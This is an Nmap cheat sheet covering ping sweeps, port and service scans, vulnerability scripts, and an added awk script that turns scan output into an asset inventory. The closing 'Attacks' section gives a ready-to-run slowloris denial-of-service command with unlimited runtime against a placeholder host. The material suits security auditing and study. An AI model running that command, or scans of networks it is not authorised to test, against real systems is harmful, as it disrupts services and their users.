Nmap
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
General Syntax
nmap [flags] host(s)
Host Discovery
ping_scan.sh
# Find what hosts are up. Light reconnaissance without attracting much attention.
nmap -sn 192.168.1.0/24
Ports
Flags
-p # Specify a single port, multiple ports (separated by commas, for example 22,80,443) or a port range (for example 20-25).
-p- # All 65535 ports
--top-ports x # The x most commonly used ports
Commands
port_scan.sh
# Scan a range of ports.
nmap -p 1-65535 192.168.1.0
Services
service_detection.sh
# Probe open ports to determine the service and version running behind them.
nmap -sV localhost
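The ping sweep and version scan above are more useful to a defender once their results are turned into an asset inventory. The script below is an added example (not part of the original cheat sheet) that parses Nmap's greppable output format (`-oG`, a real Nmap option) with awk; the scan output it works on is a constructed sample embedded in the script, not real scan data.

```shell
#!/bin/sh
# Constructed sample of Nmap greppable (-oG) output, as produced by
# "nmap -sn -oG -" (Status lines) and "nmap -sV -oG -" (Ports lines).
# Fields on each Host: line are separated by tabs; %b expands the \t escapes.
SAMPLE_GNMAP=$(printf '%b\n' \
  '# Nmap 7.94 scan initiated (constructed sample)' \
  'Host: 192.168.1.1 (router.lan)\tStatus: Up' \
  'Host: 192.168.1.10 ()\tStatus: Up' \
  'Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///\tIgnored State: closed (997)' \
  'Host: 192.168.1.20 ()\tStatus: Down' \
  '# Nmap done (constructed sample) -- 3 IP addresses (2 hosts up)')

# Print the IP address of every host Nmap reported as up, one per line.
# Field 1 is "Host: <ip> (<name>)", field 2 is "Status: Up|Down".
up_hosts() {
    printf '%s\n' "$SAMPLE_GNMAP" | awk -F'\t' '
        /^Host:/ && $2 == "Status: Up" { split($1, h, " "); print h[2] }'
}

# Print each open port as "ip:port/proto service version".
# A Ports field lists entries separated by ", "; each entry is
# port/state/proto/owner/service/rpcinfo/version/ separated by "/".
open_ports() {
    printf '%s\n' "$SAMPLE_GNMAP" | awk -F'\t' '
        /^Host:/ && $2 ~ /^Ports:/ {
            split($1, h, " "); ip = h[2]
            sub(/^Ports: /, "", $2)
            n = split($2, ports, ", ")
            for (i = 1; i <= n; i++) {
                split(ports[i], f, "/")
                if (f[2] == "open")
                    printf "%s:%s/%s %s %s\n", ip, f[1], f[3], f[5], f[7]
            }
        }'
}

echo "Hosts up:";   up_hosts
echo "Open ports:"; open_ports
```

Replace the embedded sample with `nmap -sn -oG - 192.168.1.0/24` or `nmap -sV -oG - <host>` piped into the same awk programs to inventory a real network you are authorised to scan.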
Vulnerabilities
vulnerabilities.sh
# Run the NSE scripts in the "vuln" category to check for known vulnerabilities (-Pn skips host discovery).
nmap -Pn --script vuln 192.168.1.105
Attacks
attacks.sh
# DoS attack
nmap -p 80 --max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true X.X.X.X